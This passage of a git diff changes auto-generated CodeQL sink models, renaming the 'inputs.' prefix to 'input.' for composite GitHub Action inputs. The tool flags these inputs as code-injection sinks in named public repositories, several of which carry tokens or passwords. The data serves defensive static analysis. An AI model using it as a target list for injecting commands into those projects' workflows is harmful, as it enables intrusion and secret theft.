diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 198109f790c..5683d28567f 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["discourse/.github", "*", "inputs.about_json_path", "code-injection", "generated"] \ No newline at end of file + - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index e634eaa38a2..424c7241bcf 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dnsjava/dnsjava", "*", "inputs.name", "code-injection", "generated"] - - ["dnsjava/dnsjava", "*", "inputs.filename", "code-injection", "generated"] - - ["dnsjava/dnsjava", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index e26ba9755d0..37295f2cf6c 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotintent/react-native-ble-plx", "*", "inputs.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 2cda1936f01..e7c767d2dce 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotnet/docs-tools", "*", "inputs.support", "code-injection", "generated"] \ No newline at end of file + - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index f83cf533944..7f78690f639 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotnet/dotnet-monitor", "*", "inputs.files_to_commit", "code-injection", "generated"] \ No newline at end of file + - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index 5af04ac6ac7..ba1beace170 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dragonflydb/dragonfly", "*", "inputs.gspace-secret", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.filter", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.dfly-executable", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.build-folder-name", "code-injection", "generated"] \ No newline at end of file + - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.build-folder-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index 0d0cae87e09..d6ee6c8bb7d 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eksctl-io/eksctl", "*", "inputs.token", "code-injection", "generated"] - - ["eksctl-io/eksctl", "*", "inputs.email", "code-injection", "generated"] - - ["eksctl-io/eksctl", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 070b502e188..83951f43c63 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/apm-agent-dotnet", "*", "inputs.project", "code-injection", "generated"] - - ["elastic/apm-agent-dotnet", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 6c0cf90523a..397ab083809 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/apm-agent-java", "*", "inputs.tag", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.path", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.name", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.test-java-version", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index ca6459221d4..5dd069df499 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elementor/elementor", "*", "inputs.README_TXT_PATH", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.CHANNEL", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.PACKAGE_VERSION", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.MESSAGE", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.SLACK_TOKEN", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.SLACK_CHANNELS", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.PRERELEASE", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.TAG_NAME", "code-injection", "generated"] \ No newline at end of file + - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 79d14b65bcc..1a1d763d6e4 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["emberjs/data", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file + - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index 69771693787..a8e95d30457 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["emqx/emqx", "*", "inputs.profile", "code-injection", "generated"] - - ["emqx/emqx", "*", "inputs.otp", "code-injection", "generated"] - - ["emqx/emqx", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index a5a3cfbb1c9..52d085ee479 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eonasdan/tempus-dominus", "*", "inputs.VERSION", "code-injection", "generated"] - - ["eonasdan/tempus-dominus", "*", "inputs.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file + - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 2000f5d9d00..33c56a67cb9 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["erlang/otp", "*", "inputs.TYPE", "code-injection", "generated"] - - ["erlang/otp", "*", "inputs.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file + - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 95164c659ed..258101eecea 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["esphome/esphome", "*", "inputs.target", "code-injection", "generated"] - - ["esphome/esphome", "*", "inputs.suffix", "code-injection", "generated"] - - ["esphome/esphome", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 7e3b5e4caf6..d77e05c680b 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expensify/app", "*", "inputs.GPG_PASSPHRASE", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.PATH_ENV_FILE", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file + - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "input.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index f335170dc85..db98f8d769a 100644 
--- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/expo", "*", "inputs.ndk-version", "code-injection", "generated"] \ No newline at end of file + - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 555fa42a79c..7607840dbdc 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/vscode-expo", "*", "inputs.command", "code-injection", "generated"] - - ["expo/vscode-expo", "*", "inputs.semver", "code-injection", "generated"] - - ["expo/vscode-expo", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 8fd9440729f..2fa4f8dfa61 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["external-secrets/external-secrets", "*", "inputs.image-tag", "code-injection", "generated"] - - ["external-secrets/external-secrets", "*", "inputs.image-name", "code-injection", "generated"] \ No newline at end of file + - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index f9479e11aab..80725157e33 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/buck2", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 711eabc2bfa..9d317f14272 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/flow", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 745f89d8677..12deff387bd 100644 
--- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/yoga", "*", "inputs.version", "code-injection", "generated"] - - ["facebook/yoga", "*", "inputs.directory", "code-injection", "generated"] \ No newline at end of file + - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index a732e2fac3f..9c3c242b1ed 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebookresearch/xformers", "*", "inputs.arch", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.pytorch_channel", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.pytorch_version", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.python", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.cuda", "code-injection", "generated"] \ No newline at end of file + - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.cuda", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 1aebd1199a5..4aa1ce5c4cf 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fastly/compute-actions", "*", "inputs.fastly-api-token", "code-injection", "generated"] \ No newline at end of file + - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 708adf528f2..6f8ef16ea33 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["felangel/bloc", "*", "inputs.coverage_excludes", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.analyze_directories", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.report_on", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file + - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index 18c02da4443..bc2146921ef 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebase/firebase-ios-sdk", "*", "inputs.min-ios-version", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.sources", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.pods", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.notices-path", "code-injection", "generated"] \ No newline at end of file + - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.notices-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index c0a44fae749..eabd3834b1b 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flaxengine/flaxengine", "*", "inputs.vulkan-version", "code-injection", "generated"] \ No newline at end of file + - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index af0f474bfae..2253e33b950 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-version", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-target", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-api", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-api-token", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-url", "code-injection", "generated"] \ No newline at end of file + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index 731ecd5ab1b..bc1eb54056a 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fluxcd/flux2", "*", "inputs.bindir", "code-injection", "generated"] - - ["fluxcd/flux2", "*", "inputs.token", "code-injection", "generated"] - - ["fluxcd/flux2", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index ca4dc84bbfc..842240cfaa2 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["forcedotcom/salesforcedx-vscode", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file + - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index caa6432efa9..8ff5ee1e2c0 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fossasia/visdom", "*", "inputs.loadprbuild", "code-injection", "generated"] - - ["fossasia/visdom", "*", "inputs.usebasebranch", "code-injection", "generated"] \ No newline at end of file + - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] + - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index a2e78841f69..29c5f793fb2 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freckle/stack-action", "*", "inputs.find-options", "code-injection", "generated"] \ No newline at end of file + - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index fbb76ae46e8..2f12293df0e 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freeradius/freeradius-server", "*", "inputs.gcc_ver", "code-injection", "generated"] - - ["freeradius/freeradius-server", "*", "inputs.llvm_ver", "code-injection", "generated"] - - ["freeradius/freeradius-server", "*", "inputs.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file + - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 23d001db673..83012e51335 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gaphor/gaphor", "*", "inputs.version", "code-injection", "generated"] - - ["gaphor/gaphor", "*", "inputs.base64_encoded_pfx", 